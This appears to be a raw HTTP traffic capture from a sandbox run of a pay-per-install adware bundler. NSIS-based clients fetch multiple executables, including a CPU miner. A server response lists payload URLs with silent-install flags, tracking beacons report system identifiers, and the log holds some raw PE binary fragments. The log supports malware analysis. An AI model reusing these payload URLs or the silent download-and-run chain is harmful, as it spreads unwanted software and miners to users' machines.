?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=D1402663038E45A2BDB7F5AF181223AC; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=D1402663038E45A2BDB7F5AF181223AC,1441580349.46719; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
GET /36e0f22eacad857de2cd3b76aedc24a7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d16hr9n7t75k58.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 56304
Connection: keep-alive
Date: Thu, 27 Aug 2015 12:47:59 GMT
Last-Modified: Thu, 27 Aug 2015 10:14:28 GMT
ETag: "b638732ad509ece4839c3329584ea42b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 36445
X-Cache: Hit from cloudfront
Via: 1.1 1415e6a9d308119037d1fa89386da72a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: EZNAGlFeNUHqCNAk12I2rTH_FQjWTI50Y_Wj1xFKmVMES7RZlKm3Jw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: gmsd_re_005010082-1.20
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:07 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_perl/2.0.4 Perl/v5.10.1
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1441580347.25067; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"},{"u":0,"m":"xhamster"}]}},"freeze":3600,"refresh":3600,"version":116228}..0..
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 40746
Connection: keep-alive
Date: Fri, 04 Sep 2015 14:41:56 GMT
Last-Modified: Fri, 04 Sep 2015 14:37:33 GMT
ETag: "ceea099a2589b086940ea7e1333a3ad9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 29741
X-Cache: Hit from cloudfront
Via: 1.1 ad1289c08e15a848e5c2bc019529785a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tF56RzIgl9xhI8GZcDd2KDE0wbzLyMVAJTqQ_Y8OEveTk9VLE7MMZw==
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:08 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=DD2FA126FAC74D8AA1D05FEAF566A195; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=DD2FA126FAC74D8AA1D05FEAF566A195,1441580348.92802; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:38 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441293292"
Last-Modified: Thu, 03 Sep 2015 15:14:52 GMT
Cache-Control: max-age=211
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1441580319.dop007.am4.t,1441580318.cds064.am4.c
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"5515\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"5516\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:41 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:43 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=40536
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop018.am4.t,1441580323.cds043.am4.c
<<< skipped >>>
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Sun, 06 Sep 2015 22:58:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.23
3d3..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..https://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /idn /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=som..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..http://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Sun, 06 Sep 2015 22:58:38 GMT
Content-Type: application/octet-stream
Content-Length: 165898
Connection: keep-alive
X-Powered-By: PHP/5.5.23
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=VISWHQk.exe
<<< skipped >>>
GET /data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=2838 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:41 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1441580322.dop017.am4.t,1441580321.cds063.am4.c
GIF89a.............,...........D..;
GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.taxideataxus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:51 GMT
Server: Apache/2.2.16
Last-Modified: Sun, 06 Sep 2015 15:31:47 GMT
ETag: "4da020c-587fe8-51f15d4b59ec0"
Accept-Ranges: bytes
Content-Length: 5799912
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
<<< skipped >>>
GET /installers/bi_downloader/1441577004706/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sub.spirlymo.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 430296
Connection: keep-alive
Server: nginx
Date: Sun, 06 Sep 2015 22:03:50 GMT
Last-Modified: Sun, 06 Sep 2015 22:03:26 GMT
ETag: "55ecb82e-690d8"
Expires: Sun, 06 Sep 2015 22:13:50 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 103
X-Cache: Hit from cloudfront
Via: 1.1 7f0216233154388a0ffe191ece5a7b12.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GoOd6GvsWR6NrFud1AQQClsWl1vphn6Nc-zOIzB4_jw_YK1Jq-Zi6w==
<<< skipped >>>
GET /CPUminer/Bundle_CPUminer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:50 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439472602"
Last-Modified: Thu, 13 Aug 2015 13:30:02 GMT
Cache-Control: max-age=77077
Content-Length: 100529
Content-Type: application/octet-stream
X-HW: 1441580330.dop008.fr7.t,1441580330.cds039.fr7.c
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6423 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: yAnqCYumV2NHupJk8ImF VZ1AFmRJGxJrOICcP3OSwinz1SRRUIgnns0M 7Izsp
x-amz-request-id: C0D7DE4D39B4F8E6
Date: Sun, 06 Sep 2015 22:58:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9431 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: XrgF/m9KHMNmyqCJuhjzB3kwtEr0gSYQz2veX0Kzzlorl5XxHQA2PItrs9ILnaaa
x-amz-request-id: AB86F51F954E5102
Date: Sun, 06 Sep 2015 22:58:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6862 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: u2johjF6889Rjw23ttIuWqXtOX1O/Y1jK2CgF6dwjlsaNxX41ZN2Hk24uayr5M/r
x-amz-request-id: 3CFC1E57BB33CF5C
Date: Sun, 06 Sep 2015 22:58:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=933 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: yHyhRnYS2MCGujz1F hdSUFiciK/QQl7vBDxi10SceIKYmNvJzsmX6sNawTB9cML
x-amz-request-id: B7C75AB49B620942
Date: Sun, 06 Sep 2015 22:58:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5132 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: szbKIMajNLrJQXm5yxldzCXQ84eIdh6TMfOfEdjLaVKPohXER2JVmiTcEXEslTfH
x-amz-request-id: 1F3CD514527FB00A
Date: Sun, 06 Sep 2015 22:58:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6473 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: jtkw/8 MMQQsb5EafOq/AleDoUPll2BbzfXrRshVdb/y9kFYV9vmmdrkAzD1u1tQ
x-amz-request-id: 73C1FCF601D17D8A
Date: Sun, 06 Sep 2015 22:59:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=1898 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 0mLafLqiFoE7lAnjOckFkBiq3oFHOUGuU/UPAdPviX08ujUZ0Q/PLFfUVmFGLYRe
x-amz-request-id: 7E7AA2A235A254B9
Date: Sun, 06 Sep 2015 22:59:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=0E4EAB8E159440C295ABAE9174EC5050; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=0E4EAB8E159440C295ABAE9174EC5050,1441580349.56868; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
GET /data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=2444 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:12 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1441580352.dop006.am4.t,1441580352.cds063.am4.c
GIF89a.............,...........D..;..
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 459
Connection: Keep-Alive
Cache-Control: no-cache
cnt=c4cd2a1e9d435f16d360805b8034cae5&_srvlog=NSI &browser=ie&capp=nsdummy&cid=12216&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=C8318CA6891F5119A9FD96EC19E98D71&sysid1=C8318CA6891F5119A9FD96EC19E98D71&te=1441580333&ts=1441580332&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:\DOCUME~1\adm\LOCALS~1\Temp\nsh37.tmp /ci 12216&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sun, 06 Sep 2015 22:58:52 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..
GET /smt.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d10huri5h4o4a3.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 211114
Connection: keep-alive
Date: Sat, 29 Aug 2015 04:33:07 GMT
Last-Modified: Wed, 25 Feb 2015 18:08:27 GMT
ETag: "20f288aa7d995a4bfcb240b66383ebf4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 63186
X-Cache: Hit from cloudfront
Via: 1.1 a1f7dccda76e63b2a1a4c1c034019a4b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tbV4Yt9mde8YGHNk_aW0Hd8EvnIoo-IG8Fz4BXyLs9x45Ciidw_FSw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t....... ...f...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...0...............................rsrc....f... ...h...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=F1D48DACDE97474BBB5711B2490125BD; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F1D48DACDE97474BBB5711B2490125BD,1441580349.03597; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:35 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
